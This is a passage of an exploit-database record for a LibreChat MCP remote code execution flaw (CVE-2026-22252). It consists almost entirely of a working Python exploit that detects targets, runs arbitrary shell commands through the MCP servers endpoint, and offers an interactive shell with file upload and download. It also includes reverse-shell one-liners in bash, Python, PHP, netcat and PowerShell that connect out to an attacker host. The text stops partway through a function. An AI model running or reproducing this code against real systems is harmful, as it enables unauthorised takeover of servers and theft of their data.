{“lastseen”:”2026-01-30T17:50:33″,”description”:”This proof of concept exploit targets the LibreChat MCP remote code execution vulnerability known as CVE-2026-22252. It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple…”,”published”:”2026-01-30T00:00:00″,”modified”:”2026-01-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:214609″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22252″],”sourceData”:”=============================================================================================================================================\\n | # Title : LibreChat MCP 0.8.2-rc2 RCE Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.librechat.ai\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213714\/ \\u0026 \\tCVE-2026-22252\\n \\n [+] Summary : exploit targets the LibreChat MCP Remote Code Execution vulnerability (CVE-2026-22252). \\n It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple extraction modes.\\n [+] Key Features:\\n \\n Target Discovery: Detects LibreChat installations, extracts version, OS type, shell, CSRF status, and public writable paths.\\n \\n MCP Interaction: Checks MCP endpoint availability, determines required permissions, and supports command execution with optional token-based authentication.\\n \\n Command Execution: Executes system commands safely using multiple extraction modes: direct, file, network, or base64 encoded.\\n \\n Vulnerability Testing: Performs safe and thorough tests with verification of results.\\n \\n Interactive Shell: Provides a CLI interface with command history, status display, file upload\/download, reverse shell creation, and rate limiting.\\n \\n Cross-Platform Support: Works on Linux, macOS, and Windows with adaptive shell commands.\\n \\n Logging \\u0026 Debugging: Detailed logs saved locally and on-screen, with verbose mode for troubleshooting.\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import re\\n import time\\n import argparse\\n import signal\\n import os\\n import random\\n import string\\n from typing import Optional, Dict, Any, Tuple, List\\n from dataclasses import dataclass\\n from enum import Enum\\n import logging\\n from urllib.parse import urljoin, urlparse\\n from pathlib import Path\\n import hashlib\\n \\n logging.basicConfig(\\n level=logging.INFO,\\n format=’%(asctime)s – %(levelname)s – %(message)s’,\\n handlers=[\\n logging.StreamHandler(),\\n logging.FileHandler(‘librechat_exploit.log’)\\n ]\\n )\\n logger = logging.getLogger(__name__)\\n \\n class TransportType(Enum):\\n \\”\\”\\”Supported transport types\\”\\”\\”\\n STDIO = \\”stdio\\”\\n SSE = \\”sse\\”\\n HTTP = \\”http\\”\\n \\n class ExploitMode(Enum):\\n \\”\\”\\”Output extraction methods\\”\\”\\”\\n DIRECT = \\”direct\\”\\n FILE = \\”file\\”\\n NETWORK = \\”network\\”\\n ENCODED = \\”encoded\\”\\n \\n @dataclass\\n class AuthResult:\\n \\”\\”\\”Authentication result\\”\\”\\”\\n success: bool\\n token: Optional[str] = None\\n cookies: Optional[Dict] = None\\n session_id: Optional[str] = None\\n csrf_token: Optional[str] = None\\n user_role: str = \\”user\\”\\n permissions: List[str] = None\\n message: str = \\”\\”\\n \\n @dataclass\\n class TargetInfo:\\n \\”\\”\\”Target system information\\”\\”\\”\\n is_librechat: bool = False\\n version: Optional[str] = None\\n csrf_enabled: bool = False\\n mcp_available: bool = False\\n mcp_requires_admin: bool = False\\n public_paths: List[str] = None\\n os_type: str = \\”linux\\”\\n shell_type: str = \\”sh\\”\\n \\n class LibreChatExploit:\\n def __init__(self, target_url: str, timeout: int = 30):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.timeout = timeout\\n self.target_info = TargetInfo()\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘application\/json, text\/plain, *\/*’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Connection’: ‘keep-alive’,\\n })\\n \\n self.auth_result = AuthResult(success=False, permissions=[])\\n self.csrf_token = None\\n \\n def _extract_csrf_token(self, response_text: str) -\\u003e Optional[str]:\\n \\”\\”\\”Extract CSRF token from HTML or JSON\\”\\”\\”\\n patterns = [\\n r’name=\\”csrfToken\\” value=\\”([^\\”]+)\\”‘,\\n r’\\”csrfToken\\”:\\”([^\\”]+)\\”‘,\\n r’window\\\\.csrfToken = \\”([^\\”]+)\\”‘,\\n r’\\u003cmeta name=\\”csrf-token\\” content=\\”([^\\”]+)\\”‘,\\n ]\\n \\n for pattern in patterns:\\n match = re.search(pattern, response_text)\\n if match:\\n return match.group(1)\\n if ‘csrf_token’ in self.session.cookies:\\n return self.session.cookies.get(‘csrf_token’)\\n \\n return None\\n \\n def _generate_random_string(self, length: int = 8) -\\u003e str:\\n \\”\\”\\”Generate random string\\”\\”\\”\\n return ”.join(random.choices(string.ascii_lowercase + string.digits, k=length))\\n \\n def _detect_public_paths(self) -\\u003e List[str]:\\n \\”\\”\\”Detect available public paths\\”\\”\\”\\n common_public_paths = [\\n ‘\/images\/’,\\n ‘\/public\/’,\\n ‘\/static\/’,\\n ‘\/assets\/’,\\n ‘\/uploads\/’,\\n ‘\/media\/’,\\n ‘\/files\/’,\\n ‘\/downloads\/’,\\n ]\\n \\n available_paths = []\\n \\n for path in common_public_paths:\\n try:\\n response = self.session.get(\\n urljoin(self.target_url, path),\\n timeout=5,\\n allow_redirects=False\\n )\\n if response.status_code in [200, 301, 302, 403]:\\n available_paths.append(path)\\n logger.debug(f\\”Found public path: {path}\\”)\\n \\n except Exception as e:\\n logger.debug(f\\”Path check {path} failed: {e}\\”)\\n continue\\n \\n return available_paths\\n \\n def _detect_os_and_shell(self) -\\u003e Tuple[str, str]:\\n \\”\\”\\”Detect operating system and shell type\\”\\”\\”\\n os_type = \\”linux\\”\\n shell_type = \\”sh\\”\\n \\n return os_type, shell_type\\n \\n def check_target(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Comprehensive target check\\”\\”\\”\\n try:\\n response = self.session.get(\\n self.target_url,\\n timeout=self.timeout\\n )\\n \\n if response.status_code != 200:\\n return False, f\\”Server unavailable (HTTP {response.status_code})\\”\\n html_content = response.text\\n librechat_indicators = [\\n ‘LibreChat’,\\n ‘librechat’,\\n ‘Evo’,\\n ‘next\/head’,\\n ‘authToken’,\\n ‘conversationId’,\\n ]\\n \\n is_librechat = any(indicator.lower() in html_content.lower() \\n for indicator in librechat_indicators)\\n \\n if not is_librechat:\\n return False, \\”This may not be a LibreChat server\\”\\n \\n self.target_info.is_librechat = True\\n version_patterns = [\\n r’\\”version\\”:\\”([^\\”]+)\\”‘,\\n r’librechat-([\\\\d\\\\.]+)’,\\n r’v(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)’,\\n r’Version\\\\s+([\\\\d\\\\.]+)’,\\n ]\\n \\n for pattern in version_patterns:\\n match = re.search(pattern, html_content, re.IGNORECASE)\\n if match:\\n self.target_info.version = match.group(1)\\n break\\n self.csrf_token = self._extract_csrf_token(html_content)\\n if self.csrf_token:\\n self.session.headers.update({‘X-CSRF-Token’: self.csrf_token})\\n self.target_info.csrf_enabled = True\\n self.target_info.public_paths = self._detect_public_paths()\\n self.target_info.os_type, self.target_info.shell_type = self._detect_os_and_shell()\\n \\n return True, f\\”LibreChat {self.target_info.version if self.target_info.version else ‘unknown’}\\”\\n \\n except requests.RequestException as e:\\n return False, f\\”Connection error: {e}\\”\\n except Exception as e:\\n logger.error(f\\”Unexpected error in target check: {e}\\”)\\n return False, f\\”Check error: {e}\\”\\n \\n def _get_user_permissions(self) -\\u003e List[str]:\\n \\”\\”\\”Get user permissions\\”\\”\\”\\n permissions = []\\n check_endpoints = [\\n (‘\/api\/admin’, ‘admin_access’),\\n (‘\/api\/mcp\/servers’, ‘mcp_access’),\\n (‘\/api\/users’, ‘user_management’),\\n (‘\/api\/settings’, ‘settings_access’),\\n ]\\n \\n for endpoint, perm_name in check_endpoints:\\n try:\\n url = urljoin(self.target_url, endpoint)\\n response = self.session.get(url, timeout=10)\\n \\n if response.status_code == 200:\\n permissions.append(perm_name)\\n elif response.status_code == 403:\\n permissions.append(f\\”{perm_name}_denied\\”)\\n elif response.status_code == 404:\\n pass\\n \\n except Exception as e:\\n logger.debug(f\\”Permission check {perm_name} failed: {e}\\”)\\n \\n return permissions\\n \\n def check_mcp_endpoint(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Check MCP endpoint and permissions\\”\\”\\”\\n mcp_url = urljoin(self.target_url, ‘\/api\/mcp\/servers’)\\n \\n try:\\n response = self.session.get(mcp_url, timeout=self.timeout)\\n \\n if response.status_code == 401:\\n logger.debug(\\”MCP requires authentication\\”)\\n elif response.status_code == 403:\\n self.target_info.mcp_requires_admin = True\\n return False, \\”Requires admin privileges\\”\\n elif response.status_code == 404:\\n alt_paths = [‘\/api\/v1\/mcp\/servers’, ‘\/api\/v2\/mcp\/servers’, ‘\/mcp\/api\/servers’]\\n for path in alt_paths:\\n alt_url = urljoin(self.target_url, path)\\n try:\\n alt_response = self.session.get(alt_url, timeout=5)\\n if alt_response.status_code \\u003c 400:\\n mcp_url = alt_url\\n break\\n except:\\n continue\\n if self.auth_result.success:\\n headers = {}\\n if self.auth_result.token:\\n headers[‘Authorization’] = f\\”Bearer {self.auth_result.token}\\”\\n \\n response = self.session.get(mcp_url, headers=headers, timeout=self.timeout)\\n \\n if response.status_code == 200:\\n self.target_info.mcp_available = True\\n try:\\n test_payload = {\\n \\”config\\”: {\\n \\”type\\”: \\”stdio\\”,\\n \\”title\\”: \\”permission_test\\”,\\n \\”command\\”: \\”echo\\”,\\n \\”args\\”: [\\”test\\”]\\n }\\n }\\n \\n test_response = self.session.post(\\n mcp_url,\\n json=test_payload,\\n headers=headers,\\n timeout=self.timeout\\n )\\n \\n if test_response.status_code in [200, 201]:\\n return True, \\”Available for read\/write\\”\\n elif test_response.status_code == 403:\\n self.target_info.mcp_requires_admin = True\\n return False, \\”Requires admin privileges for write\\”\\n else:\\n return True, f\\”Read only (POST: {test_response.status_code})\\”\\n \\n except Exception as e:\\n logger.debug(f\\”MCP permission test failed: {e}\\”)\\n return True, \\”Available (write test failed)\\”\\n \\n elif response.status_code == 403:\\n self.target_info.mcp_requires_admin = True\\n return False, \\”Forbidden – requires higher privileges\\”\\n \\n elif response.status_code == 404:\\n return False, \\”Endpoint not found\\”\\n \\n return False, f\\”Unknown status: {response.status_code}\\”\\n \\n except Exception as e:\\n logger.error(f\\”MCP check error: {e}\\”)\\n return False, f\\”Connection error: {e}\\”\\n \\n def execute_command(self, command: str, exfil_mode: ExploitMode = ExploitMode.DIRECT) -\\u003e Tuple[bool, str, Optional[str]]:\\n \\”\\”\\”Execute command with multiple output extraction options\\”\\”\\”\\n if not self.auth_result.success:\\n return False, \\”Unauthorized\\”, None\\n final_command = self._prepare_command(command, exfil_mode)\\n mcp_url = urljoin(self.target_url, ‘\/api\/mcp\/servers’)\\n \\n headers = {\\n \\”Content-Type\\”: \\”application\/json\\”,\\n }\\n \\n if self.auth_result.token:\\n headers[‘Authorization’] = f\\”Bearer {self.auth_result.token}\\”\\n \\n if self.csrf_token:\\n headers[‘X-CSRF-Token’] = self.csrf_token\\n \\n payload = {\\n \\”config\\”: {\\n \\”type\\”: \\”stdio\\”,\\n \\”title\\”: f\\”cmd_{self._generate_random_string()}\\”,\\n \\”command\\”: self._get_shell_path(),\\n \\”args\\”: [\\”-c\\”, final_command]\\n }\\n }\\n \\n try:\\n logger.info(f\\”Sending command via MCP…\\”)\\n response = self.session.post(\\n mcp_url,\\n json=payload,\\n headers=headers,\\n timeout=self.timeout\\n )\\n \\n if response.status_code in [200, 201]:\\n output = self._retrieve_output(command, exfil_mode)\\n return True, \\”Command executed successfully\\”, output\\n else:\\n error_msg = f\\”Execution failed: {response.status_code}\\”\\n if response.text:\\n error_msg += f\\” – {response.text[:200]}\\”\\n return False, error_msg, None\\n \\n except requests.Timeout:\\n return False, \\”Timeout – command may still be executing\\”, None\\n except Exception as e:\\n logger.error(f\\”Execution error: {e}\\”)\\n return False, f\\”Error: {e}\\”, None\\n \\n def _prepare_command(self, command: str, exfil_mode: ExploitMode) -\\u003e str:\\n \\”\\”\\”Prepare command based on extraction method\\”\\”\\”\\n random_suffix = self._generate_random_string()\\n \\n if exfil_mode == ExploitMode.DIRECT:\\n return f\\”({command}) 2\\u003e\\u00261\\”\\n \\n elif exfil_mode == ExploitMode.FILE:\\n temp_file = f\\”\/tmp\/cmd_out_{random_suffix}.txt\\”\\n return f\\”({command}) 2\\u003e\\u00261 \\u003e {temp_file} \\u0026\\u0026 echo ‘OUTPUT_SAVED:{temp_file}’\\”\\n \\n elif exfil_mode == ExploitMode.NETWORK:\\n return f\\”({command}) 2\\u003e\\u00261 | base64\\”\\n \\n elif exfil_mode == ExploitMode.ENCODED:\\n return f\\”echo ‘START_OUTPUT’ \\u0026\\u0026 ({command}) 2\\u003e\\u00261 | base64 -w0 \\u0026\\u0026 echo ‘END_OUTPUT’\\”\\n \\n return f\\”({command}) 2\\u003e\\u00261\\”\\n \\n def _get_shell_path(self) -\\u003e str:\\n \\”\\”\\”Get appropriate shell path\\”\\”\\”\\n if self.target_info.os_type == \\”windows\\”:\\n return \\”cmd.exe\\”\\n elif self.target_info.shell_type == \\”bash\\”:\\n return \\”\/bin\/bash\\”\\n else:\\n return \\”\/bin\/sh\\”\\n \\n def _retrieve_output(self, original_command: str, exfil_mode: ExploitMode) -\\u003e Optional[str]:\\n \\”\\”\\”Retrieve command output\\”\\”\\”\\n output = None\\n \\n try:\\n if exfil_mode == ExploitMode.DIRECT:\\n pass\\n \\n elif exfil_mode == ExploitMode.FILE:\\n find_cmd = f\\”find \/tmp -name ‘*cmd_out_*.txt’ -mmin -1 2\\u003e\/dev\/null | head -5\\”\\n success, files_output = self._execute_simple_command(find_cmd)\\n \\n if success and files_output:\\n for line in files_output.split(‘\\\\n’):\\n if line.strip():\\n read_cmd = f\\”cat {line.strip()} 2\\u003e\/dev\/null \\u0026\\u0026 rm -f {line.strip()}\\”\\n success, content = self._execute_simple_command(read_cmd)\\n if success:\\n output = content\\n break\\n \\n elif exfil_mode == ExploitMode.ENCODED:\\n log_cmds = [\\n \\”dmesg | tail -20 2\\u003e\/dev\/null\\”,\\n \\”journalctl –no-pager -n 20 2\\u003e\/dev\/null\\”,\\n \\”cat \/var\/log\/syslog 2\\u003e\/dev\/null | tail -20\\”,\\n ]\\n \\n for log_cmd in log_cmds:\\n success, log_output = self._execute_simple_command(log_cmd)\\n if success and \\”START_OUTPUT\\” in log_output:\\n start = log_output.find(\\”START_OUTPUT\\”) + len(\\”START_OUTPUT\\”)\\n end = log_output.find(\\”END_OUTPUT\\”)\\n if end \\u003e start:\\n encoded = log_output[start:end].strip()\\n try:\\n import base64\\n output = base64.b64decode(encoded).decode(‘utf-8′, errors=’ignore’)\\n except:\\n output = encoded\\n break\\n \\n except Exception as e:\\n logger.debug(f\\”Output retrieval failed: {e}\\”)\\n \\n return output\\n \\n def _execute_simple_command(self, command: str) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Execute simple command (for extraction)\\”\\”\\”\\n try:\\n success, msg, output = self.execute_command(\\n command, \\n exfil_mode=ExploitMode.ENCODED\\n )\\n return success, output if output else \\”\\”\\n except:\\n return False, \\”\\”\\n \\n def test_vulnerability(self) -\\u003e Tuple[bool, str, Optional[str]]:\\n \\”\\”\\”Test vulnerability accurately and safely\\”\\”\\”\\n test_id = self._generate_random_string(12)\\n test_file = f\\”\/tmp\/librechat_test_{test_id}.txt\\”\\n test_command = f\\”\\”\\”\\n echo \\”=== TEST START {test_id} ===\\” \\u0026\\u0026 \\n id \\u0026\\u0026 \\n echo \\”—\\” \\u0026\\u0026 \\n whoami \\u0026\\u0026 \\n echo \\”—\\” \\u0026\\u0026 \\n pwd \\u0026\\u0026 \\n echo \\”—\\” \\u0026\\u0026 \\n uname -a \\u0026\\u0026 \\n echo \\”=== TEST END {test_id} ===\\”\\n \\”\\”\\”\\n \\n logger.info(f\\”Testing vulnerability (ID: {test_id})…\\”)\\n for exfil_mode in [ExploitMode.ENCODED, ExploitMode.FILE, ExploitMode.DIRECT]:\\n logger.debug(f\\”Trying method: {exfil_mode.value}\\”)\\n \\n success, message, output = self.execute_command(test_command, exfil_mode)\\n \\n if success:\\n logger.info(f\\”[ok] Execution successful with {exfil_mode.value}\\”)\\n \\n if output:\\n \\n if test_id in output:\\n logger.info(f\\”[ok] Results verified\\”)\\n return True, f\\”Vulnerability exists and exploitable (method: {exfil_mode.value})\\”, output\\n else:\\n logger.debug(\\”Results don’t contain expected identifier\\”)\\n \\n return True, f\\”Vulnerability exists (execution successful)\\”, output\\n time.sleep(1) \\n file_test_command = f\\”echo ‘VULN_TEST_{test_id}’ \\u003e {test_file}\\”\\n check_command = f\\”cat {test_file} 2\\u003e\/dev\/null \\u0026\\u0026 rm -f {test_file}\\”\\n \\n success1, msg1, _ = self.execute_command(file_test_command, ExploitMode.DIRECT)\\n time.sleep(1)\\n success2, msg2, output = self.execute_command(check_command, ExploitMode.ENCODED)\\n \\n if success1 and success2 and output and f\\”VULN_TEST_{test_id}\\” in output:\\n return True, \\”Vulnerability exists (file test successful)\\”, output\\n \\n return False, \\”Vulnerability not found or not exploitable\\”, None\\n \\n class InteractiveExploitShell:\\n \\”\\”\\”Enhanced interactive interface\\”\\”\\”\\n def __init__(self, exploit: LibreChatExploit):\\n self.exploit = exploit\\n self.running = True\\n self.command_history = []\\n self.session_id = hashlib.md5(str(time.time()).encode()).hexdigest()[:8]\\n signal.signal(signal.SIGINT, self._signal_handler)\\n signal.signal(signal.SIGTERM, self._signal_handler)\\n self.rate_limit = 1.0 \\n self.last_command_time = 0\\n self.output_mode = ExploitMode.ENCODED\\n \\n def _signal_handler(self, signum, frame):\\n \\”\\”\\”Handle system signals\\”\\”\\”\\n logger.info(f\\”\\\\n[!] Received signal {signum} – safe termination…\\”)\\n self.running = False\\n \\n def _check_rate_limit(self):\\n \\”\\”\\”Check rate limiting\\”\\”\\”\\n current_time = time.time()\\n time_since_last = current_time – self.last_command_time\\n \\n if time_since_last \\u003c self.rate_limit:\\n sleep_time = self.rate_limit – time_since_last\\n logger.debug(f\\”Rate limiting: wait {sleep_time:.2f} seconds\\”)\\n time.sleep(sleep_time)\\n \\n def _cleanup_temp_files(self):\\n \\”\\”\\”Clean up temporary files if possible\\”\\”\\”\\n cleanup_cmd = \\”find \/tmp -name ‘*librechat_*’ -mmin +5 -delete 2\\u003e\/dev\/null\\”\\n self.exploit.execute_command(cleanup_cmd, ExploitMode.DIRECT)\\n \\n def run(self):\\n \\”\\”\\”Run interactive interface\\”\\”\\”\\n print(f\\”\\\\n{‘=’*60}\\”)\\n print(f\\”LibreChat MCP RCE – Session: {self.session_id}\\”)\\n print(f\\”Target: {self.exploit.target_url}\\”)\\n print(f\\”User: {self.exploit.auth_result.user_role}\\”)\\n print(f\\”{‘=’*60}\\”)\\n print(\\”Type ‘help’ for full menu\\”)\\n \\n while self.running:\\n try:\\n self._check_rate_limit()\\n \\n prompt = f\\”\\\\nexploit[{self.session_id}]\\u003e \\”\\n try:\\n cmd = input(prompt).strip()\\n except (EOFError, KeyboardInterrupt):\\n print(\\”\\\\n[*] Ending session…\\”)\\n break\\n \\n if not cmd:\\n continue\\n \\n self.last_command_time = time.time()\\n self.command_history.append(cmd)\\n \\n if len(self.command_history) \\u003e 50:\\n self.command_history.pop(0)\\n \\n if self._handle_special_commands(cmd):\\n continue\\n \\n self._execute_user_command(cmd)\\n \\n except Exception as e:\\n logger.error(f\\”Interactive interface error: {e}\\”)\\n time.sleep(0.5)\\n \\n self._cleanup_temp_files()\\n print(f\\”\\\\n[*] Ending session {self.session_id}\\”)\\n \\n def _handle_special_commands(self, cmd: str) -\\u003e bool:\\n \\”\\”\\”Handle special commands\\”\\”\\”\\n cmd_lower = cmd.lower().strip()\\n \\n if cmd_lower == ‘exit’ or cmd_lower == ‘quit’:\\n self.running = False\\n return True\\n \\n elif cmd_lower == ‘help’:\\n self._show_help()\\n return True\\n \\n elif cmd_lower == ‘history’:\\n self._show_history()\\n return True\\n \\n elif cmd_lower == ‘status’:\\n self._show_status()\\n return True\\n \\n elif cmd_lower == ‘mode’:\\n self._change_output_mode()\\n return True\\n \\n elif cmd_lower == ‘clear’:\\n os.system(‘clear’ if os.name != ‘nt’ else ‘cls’)\\n return True\\n \\n elif cmd_lower.startswith(‘shell ‘):\\n self._handle_reverse_shell(cmd)\\n return True\\n \\n elif cmd_lower.startswith(‘upload ‘):\\n self._handle_file_upload(cmd)\\n return True\\n \\n elif cmd_lower.startswith(‘download ‘):\\n self._handle_file_download(cmd)\\n return True\\n \\n return False\\n \\n def _show_help(self):\\n \\”\\”\\”Show help menu\\”\\”\\”\\n help_text = \\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 LibreChat RCE Commands by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n Basic Commands:\\n help Show this menu\\n exit \/ quit Exit session\\n status Show system status\\n history Show command history\\n clear Clear screen\\n mode Change output display method\\n \\n Advanced Commands:\\n shell [LHOST] [LPORT] Create reverse shell\\n upload [local] [remote] Upload file\\n download [remote] [local] Download file\\n \\n System Exploration:\\n pwd Current directory\\n ls [path] List files\\n cat [file] Show file content\\n \\n Information Gathering:\\n id User information\\n whoami Username\\n uname -a System info\\n ps aux Running processes\\n \\n Note: Use ‘;’ to separate multiple commands\\n \\”\\”\\”\\n print(help_text)\\n \\n def _show_history(self):\\n \\”\\”\\”Show command history\\”\\”\\”\\n if not self.command_history:\\n print(\\”[*] No commands in history\\”)\\n return\\n \\n print(\\”\\\\nCommand History (newest first):\\”)\\n print(\\”-\\” * 50)\\n for i, cmd in enumerate(reversed(self.command_history[-10:]), 1):\\n print(f\\”{i:2d}. {cmd[:60]}{‘…’ if len(cmd) \\u003e 60 else ”}\\”)\\n print(\\”-\\” * 50)\\n \\n def _show_status(self):\\n \\”\\”\\”Show system status\\”\\”\\”\\n print(f\\”\\\\n{‘=’*50}\\”)\\n print(\\”System Status:\\”)\\n print(f\\”{‘=’*50}\\”)\\n print(f\\”Target: {self.exploit.target_url}\\”)\\n print(f\\”Version: {self.exploit.target_info.version or ‘unknown’}\\”)\\n print(f\\”User: {self.exploit.auth_result.user_role}\\”)\\n print(f\\”OS: {self.exploit.target_info.os_type}\\”)\\n print(f\\”Shell: {self.exploit.target_info.shell_type}\\”)\\n print(f\\”CSRF: {‘enabled’ if self.exploit.target_info.csrf_enabled else ‘disabled’}\\”)\\n print(f\\”MCP: {‘available’ if self.exploit.target_info.mcp_available else ‘unavailable’}\\”)\\n print(f\\”Requires admin: {‘yes’ if self.exploit.target_info.mcp_requires_admin else ‘no’}\\”)\\n print(f\\”Output method: {self.output_mode.value}\\”)\\n print(f\\”{‘=’*50}\\”)\\n \\n def _change_output_mode(self):\\n \\”\\”\\”Change output display method\\”\\”\\”\\n modes = list(ExploitMode)\\n print(\\”\\\\nAvailable output methods:\\”)\\n for i, mode in enumerate(modes, 1):\\n print(f\\” {i}. {mode.value}\\”)\\n \\n try:\\n choice = input(\\”\\\\nChoose number [1-4]: \\”).strip()\\n if choice.isdigit() and 1 \\u003c= int(choice) \\u003c= len(modes):\\n self.output_mode = modes[int(choice) – 1]\\n print(f\\”[ok] Changed to: {self.output_mode.value}\\”)\\n else:\\n print(\\”[!] Invalid choice\\”)\\n except:\\n print(\\”[!] Choice error\\”)\\n \\n def _handle_reverse_shell(self, cmd: str):\\n \\”\\”\\”Handle reverse shell command\\”\\”\\”\\n parts = cmd.split()\\n if len(parts) \\u003c 3:\\n print(\\”[!] Usage: shell [LHOST] [LPORT]\\”)\\n return\\n \\n lhost = parts[1]\\n lport = parts[2]\\n \\n if not lport.isdigit():\\n print(\\”[!] Port must be a number\\”)\\n return\\n \\n print(f\\”\\\\n[*] Preparing reverse shell to {lhost}:{lport}\\”)\\n print(\\”[*] Make sure listener is running:\\”)\\n print(f\\” nc -lvnp {lport}\\”)\\n print(\\”\\\\n[*] Attempting…\\”)\\n \\n shells = []\\n \\n if self.exploit.target_info.os_type == \\”linux\\”:\\n shells = [\\n f\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261’\\”,\\n f\\”python3 -c ‘import socket,os,pty;s=socket.socket();s.connect((\\\\\\”{lhost}\\\\\\”,{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\\\\\”\/bin\/bash\\\\\\”)’\\”,\\n f\\”php -r ‘$s=fsockopen(\\\\\\”{lhost}\\\\\\”,{lport});exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”,\\n f\\”nc -e \/bin\/sh {lhost} {lport}\\”,\\n ]\\n elif self.exploit.target_info.os_type == \\”windows\\”:\\n shells = [\\n f\\”powershell -c \\\\\\”$c=New-Object System.Net.Sockets.TCPClient(‘{lhost}’,{lport});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2\\u003e\\u00261 | Out-String );$sb2=$sb+’PS ‘+(pwd).Path+’\\u003e ‘;$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()}};$c.Close()\\\\\\”\\”,\\n ]\\n \\n for i, shell_cmd in enumerate(shells, 1):\\n print(f\\”\\\\n[*] Trying shell #{i}…\\”)\\n success, message, _ = self.exploit.execute_command(shell_cmd, self.output_mode)\\n \\n if success:\\n print(f\\”[ok] Shell sent successfully\\”)\\n print(\\”[*] Wait 5 seconds for connection…\\”)\\n time.sleep(5)\\n break\\n else:\\n print(f\\”[no] Failed: {message}\\”)\\n \\n def _handle_file_upload(self, cmd: str):\\n \\”\\”\\”Upload file to server\\”\\”\\”\\n parts = cmd.split()\\n if len(parts) \\u003c 3:\\n print(\\”[!] Usage: upload [local file] [remote path]\\”)\\n return\\n \\n local_file = parts[1]\\n remote_path = parts[2]\\n \\n if not os.path.exists(local_file):\\n print(f\\”[!] Local file not found: {local_file}\\”)\\n return\\n \\n try:\\n with open(local_file, ‘rb’) as f:\\n content = f.read()\\n \\n import base64\\n encoded_content = base64.b64encode(content).decode(‘utf-8’)\\n \\n upload_cmd = f\\”\\”\\”\\n echo ‘{encoded_content}’ | base64 -d \\u003e \\”{remote_path}\\” \\u0026\\u0026 \\n echo \\”UPLOAD_SUCCESS: {remote_path}\\” || \\n echo \\”UPLOAD_FAILED\\”\\n \\”\\”\\”\\n \\n print(f\\”[*] Uploading {local_file} to {remote_path}…\\”)\\n success, message, output = self.exploit.execute_command(upload_cmd, self.output_mode)\\n \\n if success and output and \\”UPLOAD_SUCCESS\\” in output:\\n print(f\\”[ok] File uploaded successfully\\”)\\n else:\\n print(f\\”[no] Upload failed: {message}\\”)\\n \\n except Exception as e:\\n print(f\\”[no] Upload error: {e}\\”)\\n \\n def _handle_file_download(self, cmd: str):\\n \\”\\”\\”Download file from server\\”\\”\\”\\n parts = cmd.split()\\n if len(parts) \\u003c 3:\\n print(\\”[!] Usage: download [remote path] [local file]\\”)\\n return\\n \\n remote_path = parts[1]\\n local_file = parts[2]\\n \\n download_cmd = f\\”\\”\\”\\n if [ -f \\”{remote_path}\\” ]; then\\n cat \\”{remote_path}\\” | base64 -w0;\\n echo \\”\\”;\\n else\\n echo \\”FILE_NOT_FOUND\\”;\\n fi\\n \\”\\”\\”\\n \\n print(f\\”[*] Downloading {remote_path} to {local_file}…\\”)\\n success, message, output = self.exploit.execute_command(download_cmd, ExploitMode.ENCODED)\\n \\n if success and output and output.strip() and \\”FILE_NOT_FOUND\\” not in output:\\n try:\\n import base64\\n content = base64.b64decode(output.strip())\\n \\n with open(local_file, ‘wb’) as f:\\n f.write(content)\\n \\n print(f\\”[ok] Downloaded successfully ({len(content)} bytes)\\”)\\n \\n except Exception as e:\\n print(f\\”[no] Decryption error: {e}\\”)\\n else:\\n print(f\\”[no] Download failed: {message}\\”)\\n \\n def _execute_user_command(self, cmd: str):\\n \\”\\”\\”Execute user command\\”\\”\\”\\n print(f\\”[*] Executing…\\”)\\n \\n start_time = time.time()\\n success, message, output = self.exploit.execute_command(cmd, self.output_mode)\\n elapsed = time.time() – start_time\\n \\n if success:\\n print(f\\”[ok] Executed ({elapsed:.2f} seconds)\\”)\\n if output and output.strip():\\n print(f\\”\\\\n{‘=’*50}\\”)\\n print(\\”Output:\\”)\\n print(f\\”{‘=’*50}\\”)\\n print(output[:5000]) \\n if len(output) \\u003e 5000:\\n 